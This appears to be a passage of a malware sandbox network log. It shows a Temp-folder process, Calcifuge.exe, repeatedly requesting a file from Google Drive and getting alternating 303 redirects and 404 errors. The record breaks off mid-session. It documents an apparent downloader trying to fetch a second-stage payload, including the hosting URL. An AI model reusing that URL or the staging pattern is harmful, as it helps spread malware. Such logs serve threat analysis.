                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-ufYPDL2NbjaF7JZtrzdbwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              27 | 192.168.2.4 | 53578 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:01 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:01 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgRG8WkLb31Ut1ucvbr2b6uOvIsSfcQbaPVd9cSsYTzu6E44pj48xNhOmjYJafErMSkZ
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:01 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-EcPLHr66Dt5TCYJ6lXLqQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dOHLselp_E4EzUt3H5svaQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              28 | 192.168.2.4 | 53585 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:02 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:02 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-CdOcdSGGk-P-H1iEubm8kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              29 | 192.168.2.4 | 53595 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:03 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:03 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgT_x5rtIIXqYxIkKHJGIL5YYVD0Ec2JWNNgKtAL5EBKvaT7MOS6XWG3MVUUnS12bQVl
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:03 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-61RmDkyh32boM5cVfe-2Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:03 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BLsOWaFvvconYFA-EVkXZw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              30 | 192.168.2.4 | 53602 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:04 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:04 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8nfhf8tl-qGMkIzNNdozOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              31 | 192.168.2.4 | 53609 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:05 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:06 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQWXf7ns6deNNoSXRMSz6eIaAnAEE0RhzmHg_oGEsZdcd75xEweEHosjEUMXDaAgf9UfAP9T84
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:05 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-IlHjAJcJ_9mfYtrLrqBjkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:06 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AzNuhNTOWv2KjlYunAqXtA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              32 | 192.168.2.4 | 53618 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:06 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:07 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-hUw8oBTtU2R8E64po2_dJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              33 | 192.168.2.4 | 53626 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:07 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:08 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSQbf7AyJOtEdZhRnKoXfDCVkdU56DIgx3DitzMT44VtqD-eGsZ9qb2uLtcJDT3n0CN
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:08 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-zDPM3XdZqNqAWWMAlXQdTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:08 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7zf7RMsK56hAjwVG7DlSBQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              34 | 192.168.2.4 | 53635 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:09 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:09 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:09 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-4m8MTBoy-vpZqGpAwxNKOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
